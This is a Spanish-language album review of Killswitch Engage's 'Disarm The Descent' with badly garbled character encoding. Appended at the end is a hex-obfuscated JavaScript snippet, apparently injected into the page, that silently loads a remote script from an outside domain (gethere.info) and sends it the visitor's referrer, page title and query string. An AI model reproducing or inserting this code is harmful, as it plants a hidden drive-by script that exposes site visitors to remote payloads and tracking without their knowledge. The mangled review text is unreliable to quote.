TA�tulo:A�‘Disarm The Descent’
GA�nero: Metalcore
Lanzamiento: 2 de abril, 2013
Sello: Roadrunner Records
CalificaciA?n:A�4/5
Comprar en:
DespuA�s del regreso de Jesse Leach en las vocales de Killswitch Engage a causa de la salida de Howard Jones debido a una complicaciA?n en la diabetes tipo B que padece desde hace un tiempo atrA?s. Este disco se convirtiA? en uno de los mA?s esperados del aA�o.
Un A?lbum detenido en el tiempo para todos aquellos que se hicieron fans de Killswitch Engage en su primera etapa, aunque los tiempos han cambiado y este estilo de mA?sica como negocio tiene que estar dentro de ciertos parA?metros para poder serlo y eso en ocasionesA� puede decepcionar.
‘Disarm The Descent’A�es un nuevo comienzo para Killswitch Engage, no es la pieza faltante que completara la exitosa carrera de la banda, el sonido estA? lejos de sus primeros dos A?lbumes, parecen haberse innovado demasiado, a pesar de que Adam Dutkiewicz declarA? que los dos primeras canciones que se dieron a conocer las cuales fueron a�?No End In Sighta�? e a�?In Due Timea�? estaban fuera de lo que realmente era el disco, aclarando que la influencia del thrash estaba muy marcada en este A?lbum, creo que exagerA? con esos comentarios.
Canciones como a�?Beyond The Flamesa�? y a�?You Dona��t Bleed For Mea�?, estA? dentro de lo mejor del A?lbum, a�?Alwaysa�? recordA?ndome a su segundo A?lbum a canciones como a�?Rise Insidea�? y a�?The Element Of Onea�?. Los coros son demasiado suaves, muy parecidos a sus proyectos alternos como Seemless y Times Of Grace, de hecho pareciera una mezcla de esas dos bandas.
En resumen un A?lbum con sentimientos encontrados, y sin aquellos que nos quedamos esperando otra cosa, ni modo es Killswitch Engage nos aguantamos y nos ponemos a escuchar lo bueno de este A?lbum, les dejo en una escala de 1 al 5, un 4.
http://www.youtube.com/watch?feature=player_detailpage&v=HANCzu70us4
var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}